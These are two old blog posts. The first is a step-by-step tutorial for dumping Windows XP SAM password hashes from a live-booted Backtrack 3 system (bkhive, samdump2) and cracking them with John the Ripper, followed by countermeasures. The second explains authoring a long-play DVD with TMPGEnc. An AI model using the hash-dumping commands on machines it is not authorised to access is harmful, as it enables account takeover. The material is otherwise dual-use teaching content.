Cracking WindowsXP local user password with Backtrack 3

December 8, 2008

Cracking job become easy when Backtrack Linux distro come in place, and it get easier when you want crack password saved in WinXP.

Windows XP stored it username and password information in file named SAM at %SystemDrive%:\Windows\system32\config\. The SAM file is encrypted using LM hashes, which is vulnerable to rainbow table attack and bruteforce attack.

Insert the Backtrack3 CD/USB, make it a live boot up.

When you get into Backtrack 3 Desktop

On the console, type

df *to view the harddisk partition distribution on, you may find your Windows system stored at partition /mnt/hda1 (usually, as used for example here)
cd /mnt/hda1/WINDOWS/system32/config/
bkhive system key *bkhive manual
samdump2 SAM key > ~/Desktop/password.txt *~/Desktop/password.txt is the example location for storing dumped password harsh file
cat ~/Desktop/password.txt

You will see the usersname and the hash values of the SAM file.

There are multiple way to crack the hash (johntheripper, rainbow table, LCP). Over here, we use john the ripper as example.

john ~/Desktop/password.txt –users=Administrator (Administrator is the example user name)

The user Owner has the password “abc123” and the Administrator has no password.

Countermeasure for the attack:

  • Set boot-up password on BIOS to prevent unauthorized live boot up using CD/USB storage media.
  • Secure physical access to the machine. The cardinal rule that physical access equals total access exists for a reason.
  • Use strong passwords. Strong password means combination of alphanumeric(01245…vwxyz) and symbols (!@#$%^&*()_+), at least 8 characters in length, will take much longer time (sometimes may be impossible to crack, like password “%a^&b*&e^$5*45*&^%<%” for medium-size rainbow table) to do its job.


make 16 hour DVD ! cant believe..?

October 19, 2008

ya, its true guys.you can make A Roughly 16 Hour Video Dvd
for that 3 things are needed
1. Proper Codecs
2. TMPGEnc 3 Express (Best for this job IMO)
3. TMPGEnc DVD Author (Dual Layer Edition)
simply start a new project in TMPGEnc 3 Express, Set the output for said file as an NTSC MPEG1 (VIDEO CD)
Make sure you set at NTSC (TMPGENC WILL ONLY ACCEPT IF FRAMERATE IS 29.97 FPS)
once you have made roughly 8 hours / 16 hours depending… of video files open TMPGEnc DVD Author..
Simply press “SOURCE SETUP” you will notice you can set up multiple ‘tracks’

if you add more than one file to 1 track, the program automatically sets up ‘chapters’

just add your video files (and follow the steps in the program).. it will take roughly an hour or 2 to do an 8 hour disc, maybe 3 or 4 for a 16 hour disc (i don’t have a dual layer burner but i am sure that it works)..

THESE WORK IN PLAYSTATION 2’s!!! I KNOW BECAUSE ITS HOW I MAKE MINE AT TIMES…

only way i know to get this much footage (And have it still work in something as simple as a ps2)